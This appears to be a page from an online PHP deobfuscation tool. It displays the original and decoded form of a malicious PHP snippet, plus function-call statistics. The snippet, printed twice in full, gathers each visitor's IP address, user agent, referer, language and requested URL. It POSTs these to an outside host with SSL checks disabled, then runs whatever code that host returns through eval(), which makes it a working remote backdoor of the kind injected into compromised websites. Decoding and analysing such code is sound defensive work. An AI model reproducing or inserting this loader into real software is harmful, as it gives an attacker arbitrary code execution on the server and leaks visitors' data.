Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$pod = array('jc' => '1','server_name' => $_SERVER['HTTP_HOST'],'user_agent' => $_SERVER['..
Decoded Output download
<? $pod = array('jc' => '1','server_name' => $_SERVER['HTTP_HOST'],'user_agent' => $_SERVER['HTTP_USER_AGENT'],'user_cl' => isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : (isset($_SERVER['HTTP_INCAP_CLIENT_IP']) ? $_SERVER['HTTP_INCAP_CLIENT_IP'] : (isset($_SERVER['HTTP_TRUE_CLIENT_IP']) ? $_SERVER['HTTP_TRUE_CLIENT_IP'] : (isset($_SERVER['HTTP_REMOTEIP']) ? $_SERVER['HTTP_REMOTEIP'] : (isset($_SERVER['HTTP_X_REAL_IP']) ? $_SERVER['HTTP_X_REAL_IP'] : $_SERVER['REMOTE_ADDR'])))),'http_referer' =>isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '','lan' => isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '','url' =>$_SERVER['REQUEST_URI'],);if (extension_loaded('curl')){$curl = curl_init("http://wyzdy.com/file/petitpetitgamin.com/newfile.php");curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl,CURLOPT_TIMEOUT, 5);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_USERAGENT, isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');curl_setopt($curl,CURLOPT_POST, true);curl_setopt($curl, CURLOPT_POSTFIELDS, $pod);$ret = curl_exec($curl);$cno = curl_errno($curl);$cnt = curl_error($curl);curl_close($curl);if($cno > 0){$ret = "";}}else{$pod = http_build_query($pod);$pos = array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded\r\n' . 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "
", 'Content-Length:' . strlen($pod) . "
", 'content' => $pod));$ret = file_get_contents("http://wyzdy.com/file/petitpetitgamin.com/newfile.php", false, stream_context_create($pos));}$ret = trim($ret, "");eval($ret);
?>
Did this file decode correctly?
Original Code
$pod = array('jc' => '1','server_name' => $_SERVER['HTTP_HOST'],'user_agent' => $_SERVER['HTTP_USER_AGENT'],'user_cl' => isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : (isset($_SERVER['HTTP_INCAP_CLIENT_IP']) ? $_SERVER['HTTP_INCAP_CLIENT_IP'] : (isset($_SERVER['HTTP_TRUE_CLIENT_IP']) ? $_SERVER['HTTP_TRUE_CLIENT_IP'] : (isset($_SERVER['HTTP_REMOTEIP']) ? $_SERVER['HTTP_REMOTEIP'] : (isset($_SERVER['HTTP_X_REAL_IP']) ? $_SERVER['HTTP_X_REAL_IP'] : $_SERVER['REMOTE_ADDR'])))),'http_referer' =>isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '','lan' => isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '','url' =>$_SERVER['REQUEST_URI'],);if (extension_loaded('curl')){$curl = curl_init("http://wyzdy.com/file/petitpetitgamin.com/newfile.php");curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl,CURLOPT_TIMEOUT, 5);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_USERAGENT, isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');curl_setopt($curl,CURLOPT_POST, true);curl_setopt($curl, CURLOPT_POSTFIELDS, $pod);$ret = curl_exec($curl);$cno = curl_errno($curl);$cnt = curl_error($curl);curl_close($curl);if($cno > 0){$ret = "";}}else{$pod = http_build_query($pod);$pos = array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded\\r\\n' . 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n", 'Content-Length:' . strlen($pod) . "\r\n", 'content' => $pod));$ret = file_get_contents("http://wyzdy.com/file/petitpetitgamin.com/newfile.php", false, stream_context_create($pos));}$ret = trim($ret, "\xEF\xBB\xBF");eval($ret);
Function Calls
extension_loaded | 1 |
http_build_query | 1 |
Stats
MD5 | 5bb8d86062edc166f9c75aca51d2ff42 |
Eval Count | 0 |
Decode Time | 95 ms |